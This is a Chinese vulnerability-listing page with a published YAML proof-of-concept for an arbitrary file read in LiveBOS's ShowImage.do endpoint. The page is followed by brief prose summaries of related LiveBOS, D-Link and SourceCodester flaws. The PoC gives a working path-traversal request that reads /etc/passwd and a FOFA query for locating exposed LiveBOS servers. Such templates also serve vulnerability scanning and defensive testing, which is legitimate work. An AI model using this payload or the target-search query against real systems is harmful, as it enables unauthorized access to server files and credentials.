livebos-showimage-fileread: LiveBOS ShowImage.do 任意文件读取漏洞

漏洞描述

PoC代码[已公开]

id: livebos-showimage-fileread

info:
  name: LiveBOS ShowImage.do 任意文件读取漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    LiveBOS ShowImage.do 接口存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感文件
    FOFA: app="LiveBOS-框架"
  tags: livebos,fileread
  created: 2023/09/05

rules:
  r0:
    request:
      method: GET
      path: /feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐

• livebos-uploadfile-do-fileupload: LiveBOS UploadFile.do 任意文件上传漏洞(XVE-2023-21708) POC

  2025-09-01 | LiveBOS
  fofa: body="Power by LiveBOS" LiveBOS UploadFile.do 接口存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行...

• LiveBos 数据库文件泄露漏洞 无POC

  2025-07-03 11:40:06 | LiveBos
  敏感信息泄露漏洞是指由于系统或应用程序的安全措施不足，导致敏感信息（如用户数据、系统配置、内部通信等）被未授权的第三方获取。这种漏洞可能由于不当的配置、缺乏访问控制、不安全的数据处理和传输等原因造成。...

• LiveBOS /feed/UploadFile.do;.css.jsp 文件上传漏洞 无POC

  2024-08-07 | LiveBOS
  顶点LiveBOS灵动业务架构平台（简称：LiveBOS）是创新一代的面向管理应用的运行支撑软件平台及其快速开发工具。平台可用图形化的方法进行对象、流程、报表、门户定义，形成可定义、可集成、易于修改的...

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...

• D-Link DIR-645 命令注入漏洞 无POC

  2025-09-22 00:22:31 | D-Link DIR-645
  D-Link DIR-645是中国友讯（D-Link）公司的一款无线路由器。 D-Link DIR-645 105B01版本存在命令注入漏洞，该漏洞源于对文件/soap.cgi中参数service的错...